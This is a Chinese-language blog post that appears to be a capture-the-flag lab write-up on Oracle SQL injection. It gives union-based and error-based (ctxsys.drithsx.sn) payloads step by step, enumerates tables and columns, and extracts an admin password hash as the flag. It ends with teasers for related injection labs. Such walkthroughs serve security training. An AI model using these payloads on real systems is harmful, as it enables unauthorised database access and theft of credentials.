2. 程式人生 > 其它 >封神臺靶場-Oracle注入

封神臺靶場-Oracle注入

阿新 發佈:2021-09-07

靶場

顯錯注入

判斷注入存在

http://59.63.200.79:8808/?id=1 and 1=1 #頁面正常
http://59.63.200.79:8808/?id=1 and 1=2 #頁面異常

判斷欄位數

http://59.63.200.79:8808/?id=1 order by 4 # 頁面正常
http://59.63.200.79:8808/?id=1 order by 5 # 頁面異常

得出欄位數為4

判斷顯錯點

http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar('a'),null,null from dual

得出顯錯點為第2位

資訊收集,查詢資料

# 查詢表名
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(table_name),null,null from user_tables where rownum=1

依次嘗試得出最終表有:ADMIN,MD5,NEWS

# 查詢ADMIN表字段名
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(column_name),null,null from user_tab_columns where rownum=1 and table_name ='ADMIN'

依次嘗試得出ADMIN表字段有:UPASS,UNAME

# 查詢資料
由提示知,flag為UNAME='NF'對應的UPASS欄位,所以我們直接查詢
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(UPASS),null,null from ADMIN where UNAME='NF'

得出最終flag:2a61f8bcfe7535eadcfa69eb4406ceb9

報錯注入

查詢表名

and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))-- qwe

and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN'))-- qwe

and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN' and table_name != 'NEWS'))-- qwe

得出表名:ADMIN,NEWS,MD5

查詢ADMIN表字段名

and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN'))-- qwe

and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN' and column_name != 'UNAME'))-- qwe

得出ADMIN表字段名:UNAME,UPASS

查詢資料

http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where UNAME='NF'))-- qwe

得出flag:2a61f8bcfe7535eadcfa69eb4406ceb9

相關推薦

神臺靶場-Oracle注入

靶場 顯錯注入 判斷注入存在 http://59.63.200.79:8808/?id=1 and 1=1 #頁面正常 http://59.63.200.79:8808/?id=1 and 1=2 #頁面異常

神臺靶場-MSSQL注入

MSSQL顯錯注入 與MySQL聯合查詢不同,MSSQL聯合查詢由於資料型別匹配較為嚴格,所以需要union select null來代替數字,然後不斷嘗試尋找到正確的型別,但是大體上還是相似的

神臺靶場:第一章:為了女神小芳!【配套課時:SQL注入攻擊原理 實戰演練】

靶場直鏈 http://59.63.200.79:8003/ 請求方式GET   閉合方式未知 注入方式聯合,布林,延時

神臺靶場:第七章:GET THE PASS! 【技能點:程序中抓下管理員明文密碼】

拿到SYSTEM之後,尤里並不滿足,他準備通過某種方式拿到伺服器管理員密碼,用來收集密碼資訊,以便其他方向的滲透,順便想將密碼發給小芳,用以炫技。卻不曾想,當尤里看到系統的明文密碼後。。大吃一驚。。。自此,

神臺靶場:萌新也能找CMS突破

靶場地址 http://59.63.200.79:8003/bluecms/uploads/ 百度查詢了bluecms的相關漏洞 發現存在sql注入,且sql注入點在如下網頁

如何使用sqlmap破解神臺靶場第一關

文章目錄 一.檢視是否有注入 使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch -u指令為檢視網址的url是否有漏洞。-batch為永遠不要求使用者輸入資訊,預設執行。

神臺-Head注入

思維導圖 Head注入(一) 核心程式碼 $username = $_POST[\'username\']; $password = $_POST[\'password\'];

神臺-Access注入之Cookie注入

Access注入之Cookie注入 我們進入新聞頁面,隨便點選一條新聞進入 我們通過測試發現URL傳參是有檢測的,有WAF進行攔截,於是我們換一種思路,測試一下Cookie注入

神臺-偏移注入

前言 靶場採用Access資料庫,而且對於其餘傳參進行了限制,只可通過Cookie方式進行傳參;然後通過偏移注入方式獲取資料

pick靶場-sql注入

甲.數字型注入 數字型注入一般提交值沒有引號,所以直接在後面構造語句就可以了。

Oracle 注入 All in ONE

0x01 尋找並判斷注入點 注意:避免使用and 1=1這樣的測試語句 數字型: 數字型的注入,和其他型別資料庫時都一樣,自己構造加減乘除的條件來判斷注入

Oracle注入總結

Oracle inject總結 獲取常見資訊語句 獲取資料庫版本: SELECT banner FROM v$version WHERE banner LIKE \'Oracle%\';

【墨者學院--靶場篇】題目十八:日誌檔案分析溯源(SQL注入IP地址)

日誌檔案分析溯源(SQL注入IP地址) 難易程度:一顆星 分類:電子資料取證 標籤:日誌分析電子資料資料分析

DVWA靶場——Command Injection(命令注入)

概述 Command Injection,即命令注入,是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。PHP命令注入攻擊漏洞是PHP應用程式中常見的指令碼漏洞之一,國內著名的Web應用程式Discuz!、DedeCM

墨者_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH

使用Docker搭建SQL注入靶場

Docker搭建SQL注入漏洞 什麼是Docker Docker又被叫做容器,使用教程參考我的部落格:

資料安全:校驗Oracle 11.2.0.4安裝軟體的 SHA碼 防範注入

由於很多使用者遭遇到Oracle軟體包的注入,尤其是 11.2.0.4 這個版本。 以下收錄一下 11.2.0.4 的 MD5 和 SHA-1 值,大家拿到這個版本的安裝包時,一定校驗一下再安裝,防範注入風險。

oracle報錯注入總結

oracle 報錯注入是比較簡單的一類oracle注入。 它可以直接返回資料庫版本、名稱、表、欄位等資訊,可以直接獲取資料庫資訊。從而不用通過爆破方式直接獲取資料庫資訊。

[Pikachu 靶場] 4-SQL 注入

SQLi:SQL 注入 0x00 SQLi(SQL Injection,SQL 注入注入漏洞應該是最可怕的漏洞型別了,而資料庫注入漏洞又是其中最可怕的分類。

Oracle SQL注入

0x00 Oracle基礎 Oracle 基本使用 什麼是Oracle資料庫? Oracle公司目前是世界上最大的軟體提供商之一,與它並列的還有 Microsoft與 Adode。並且隨著 Oracle的發展,它已經成為了企業辦公平臺的最大軟體提供商之